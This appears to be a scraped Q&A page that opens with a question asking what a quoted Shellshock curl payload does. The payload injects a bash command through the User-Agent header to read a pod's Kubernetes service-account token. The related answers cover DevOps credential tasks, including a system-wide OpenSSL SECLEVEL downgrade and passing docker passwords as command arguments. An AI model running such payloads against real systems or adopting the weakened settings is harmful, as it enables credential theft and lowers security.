I saw a command over the internet that we can get the token of the service account mounted in the POD in kubernetes .Below is the command
curl -A "() {:;}; echo; /bin/bash -c 'cat /var/run/secrets/kubernetes.io/serviceaccount/token'"
10.103.123.109:8585/cgi-bin/bomshell.cgi
This will print the token of the kubernetes token from the service account.
Can anybody explain me what this command is doing to do the job.
Related
We're using Jenkins (2.235.2) with BlueOcean in docker-compose with a slave from jenkinsci/jnlp-slave:latest.
So, when I need to use node(10.15.3) and dwupload(3.8.2) to delivery a cartridge in Salesforce sandbox with a two factory authentication we are getting the following error:
# command
dwupload --hostname cert.staging.(...).demandware.net --username **** --password **** --cartridge cartridges/lib_productlist --code-version hav_12 --p12 **** --passphrase ****
# error logs
{ 'file-upload': false, 'cartridge-upload': false, 'directory-create': false, 'file-delete': false } [15:28:53] Error: ca key too small
Could you help me, please.
OpenSSL is the culprit in this case, since not-so-newer installations requests longer key lengths, so there are two ways to solve this:
The "The old quick and dirty way": Just lower it:
sudo cp /etc/ssl/openssl.cnf{,.backup}
sudo sed -i 's/SECLEVEL=2/SECLEVEL=1/g' /etc/ssl/openssl.cnf
And you're good to go. If you're running Jenkins using Docker images, you're gonna have to update them. The problem with that approach is that it is system-wide.
You can change it just for dwupload by creating an alternate OpenSSL configuration file in your Jenkins pipeline. Something like this:
sh "sed 's/SECLEVEL=2/SECLEVEL=1/g' /etc/ssl/openssl.cnf > openssl_custom.cnf"
sh "OPENSSL_CONF=openssl_custom.cnf dwupload --hostname ${hostname} --username ${username} ..."
sh "rm -rf openssl_custom.cnf"
Abraços!
I'm trying to deploy a Gitlab instance and runners ready with Terraform. The script creates both Gitlab and runners without any problem, but I don't know how to register the runners automatically after the creation.
Is there any way to get the registration token from command line? If it's possible I can register just calling external data source using Terraform.
The projects API endpoint response contains the runners_token key. You can use this to automatically fetch the runner tokens for any project.
You can then use that in a few ways. One way would be to have your runner registration script fetch the runner token itself such as with this example:
curl --fail --silent --header "Private-Token: ${GITLAB_API_TOKEN}" "https://$GITLAB_URL/api/v4/projects/${PROJECT}"
Or you could use the Gitlab Terraform provider's gitlab_project data source to fetch this from whatever is running Terraform and then inject it into the thing that runs the registration script such as a templated file:
data "gitlab_project" "example" {
id = 30
}
locals {
runner_config = {
runner_token = data.gitlab_project.example.runners_token
}
}
output "example" {
value = templatefile("${path.module}/register-runners.sh.tpl", local.runner_config)
}
Yes, you can.
The command has to be run on the server hosting your Gitlab instance. The line below will output the current shared runner token.
sudo gitlab-rails runner -e production "puts Gitlab::CurrentSettings.current_application_settings.runners_registration_token"
As others have mentioned, there is not API endpoint that currently allows this (there has been discussion over this for quite some time here. However, I find this solution satisfactory for my needs.
Credits for this answer go to MxNxPx. This script used to work (for me) two days ago:
GITUSER="root"
GITURL="http://127.0.0.1"
GITROOTPWD="mysupersecretgitlabrootuserpassword"
# 1. curl for the login page to get a session cookie and the sources with the auth tokens
body_header=$(curl -k -c gitlab-cookies.txt -i "${GITURL}/users/sign_in" -sS)
# grep the auth token for the user login for
# not sure whether another token on the page will work, too - there are 3 of them
csrf_token=$(echo $body_header | perl -ne 'print "$1\n" if /new_user.*?authenticity_token"[[:blank:]]value="(.+?)"/' | sed -n 1p)
# 2. send login credentials with curl, using cookies and token from previous request
curl -sS -k -b gitlab-cookies.txt -c gitlab-cookies.txt "${GITURL}/users/sign_in" \
--data "user[login]=${GITUSER}&user[password]=${GITROOTPWD}" \
--data-urlencode "authenticity_token=${csrf_token}" -o /dev/null
# 3. send curl GET request to gitlab runners page to get registration token
body_header=$(curl -sS -k -H 'user-agent: curl' -b gitlab-cookies.txt "${GITURL}/admin/runners" -o gitlab-header.txt)
reg_token=$(cat gitlab-header.txt | perl -ne 'print "$1\n" if /code id="registration_token">(.+?)</' | sed -n 1p)
echo $reg_token
However, as of today it stopped working. I noticed the second body_header variable is empty. Upon inspecting the gitlab-header.txt file, I noticed it contained:
You are being redirected.
Whereas I would expect it to be signed in at that point, with a gitlab-header.txt file that contains the respective runner registration token. I expect I am doing something wrong, however, perhaps there has been an update to the gitlab/gitlab-ce:latest package such that a change to the script is required.
Disclaimer, I am involved in creating that code
Here is a horrible but working Python boiler plate code that gets the runner token and exports it to a parent repository: https://github.com/a-t-0/get-gitlab-runner-registration-token.
Independent usage
It requires a few manual steps to set up, and then gets the GitLab runner registration token automatically (from the CLI with:). It requires Conda and Python however, and downloads a browser controller. So it is most likely wiser to look a bit better into the curl commands instead.
Integrated in parent [bash] repository
First install the conda environment, then activate it. After that, you can execute the function below automatically from the CLI (if you put that function in a file at path parent_repo/src/get_gitlab_server_runner_token.sh, assuming you have the credentials etc as specified in the Readme), with:
cd parent_repo
source src/get_gitlab_server_runner_token.sh && get_registration_token_with_python
This bash function gets the token:
get_registration_token_with_python() {
# delete the runner registration token file if it exist
if [ -f "$RUNNER_REGISTRATION_TOKEN_FILEPATH" ] ; then
rm "$RUNNER_REGISTRATION_TOKEN_FILEPATH"
fi
git clone https://github.com/a-t-0/get-gitlab-runner-registration-token.git &&
set +e
cd get-gitlab-runner-registration-token && python -m code.project1.src
cd ..
}
And here is a BATS test that verifies the token is retrieved:
#!./test/libs/bats/bin/bats
load 'libs/bats-support/load'
load 'libs/bats-assert/load'
load 'libs/bats-file/load'
source src/get_gitlab_server_runner_token.sh
source src/hardcoded_variables.txt
#test "Checking if the gitlab runner registration token is obtained correctly." {
get_registration_token_with_python
actual_result=$(cat $RUNNER_REGISTRATION_TOKEN_FILEPATH)
EXPECTED_OUTPUT="somecode"
assert_file_exist $RUNNER_REGISTRATION_TOKEN_FILEPATH
assert_equal ${#actual_result} 20
}
adjoin -u <admin_account> dev.abc.plc.uk --zone Dev -s VC123.dev.abc.uk -c "OU=Computers,OU=Centrify,DC=dev,DC=abc,DC=uk"
I want to execute above command to join the server to active directory using ansible script with admin account which should prompt for the password.
This is for a new Linux server, running RedHat 6.1, ansible 2.6.2.
- name: 6.Join the server to Active Directory
shell:adjoin -u <admin_account> dev.abc.uk --zone Dev -s VC123.dev.abc.uk -c "OU=Computers,OU=Centrify,DC=dev,DC=abc,DC=uk"
You can use vars_prompt ansible module and capture the password.
I don't have access to the namespace openebs and maya-apiserver. Can I run mayactl on my nodes to get the same information? If yes, how does mayactl know which PVCs/PVs I have access to? How does it protect other volumes from accidental deletion via mayactl volume delete?
You can do it from maya-apiserver pod. You can do it with the below command in the master node.
kubectl exec -it <pod name> -n openebs bash
Once you are inside the pod, you can run required mayactl command
Else you can run the command directly as per below format.
kubectl exec -it <pod name> -n openebs <required mayactl command>
How can I preseed my credentials to docker login command within a script ?
I'm using a bash script that basically automates the whole process of setting up my custom VMs etc, but when I need to login to docker within the script to pull the images, I get the following error:
Username: FATA[0000] inappropriate ioctl for device
The command I was using is the following:
( echo "xxx"; echo "yyy"; echo "zzz" ) | docker login docker.somesite.org
Is this possible to achieve without using and coping over an existing .dockercfg file and how,
Many thanks.
Docker 18 and beyond
There's now an officially-documented way to do this:
cat ~/my_password.txt | docker login --username foo --password-stdin
Docker 1.11 through Docker 17
You can pass all the arguments on the command-line:
docker login --username=$DOCKER_USER --password=$DOCKER_PASS $DOCKER_HOST
If you don't specify DOCKER_HOST, you'll get the main Docker repo. If you leave out any of the arguments, you'll be prompted for that argument.
Older than 1.11
The same path as just above, except that you need to also pass an --email flag. The contents of this are not actually checked, so anything is fine:
docker login --username=$DOCKER_USER --password=$DOCKER_PASS $DOCKER_HOST --email whale#docker.com
To run the docker login command non-interactively, you can set the --password-stdin flag to provide a password through STDIN. Using STDIN prevents the password from ending up in the shell’s history, or log-files.
$ echo $DOCKER_PASS | docker login -u$DOCKER_USER --password-stdin $DOCKER_HOST
When you login to your private registry, docker auto create a file $HOME/.docker/config.json The file had the Credentials info, so you could save the file and copy to any host when you want to login the registry.
The file content like this:
{
"auths": {
"example.com": {
"auth": "xxxxxxxxxxxxxxxxxxxxxxx"
}
}
}
Add-on If you want to login multi docker registry on one server ,just add another auth info.like this:
{
"auths": {
"example.com": {
"auth": "xxxxxxxxxxxxxxxxxxxxxxx"
},
"example1.com":{
"auth": "xxxxxxxxxxxxxxxxxxxxxxx"
}
}
}
Now you can push and pull images from the example.com and example1.com.
For any random passer by that may stumble into this looking for a way to use this against an Openshift environment's container registry (Docker) you can use the following to provide the registry URI along with the credentials to log into it using an Openshift token.
$ echo "$(oc whoami -t)" | docker login -u $USER --password-stdin \
$(oc get route docker-registry -n default --no-headers | awk '{print $2}')
Login Succeeded
The above does 3 things:
Passes token retrieved from Openshift oc whoami -t
Determines Openshift's registry URI
$(oc get route docker-registry -n default --no-headers | awk '{print $2}'`)
Logs into registry using $USER + token from above
I was having massive issues with this, just wanted to add that the environment variable DOCKER_HOST has special meaning to docker to define the daemon socket it connects to, causing it to fail login. There's a full list of the environment variables docker uses here: https://docs.docker.com/engine/reference/commandline/cli/
I changed my environment variables to something else, e.g. REG_ and it worked
docker login --username $REG_USERNAME --password $REG_PASSWORD $REG_HOST
Note, if you're doing this in a gitlab runner, there's no need to use the --password-stdin flag if you're already using variable masking (you can, there's just no need).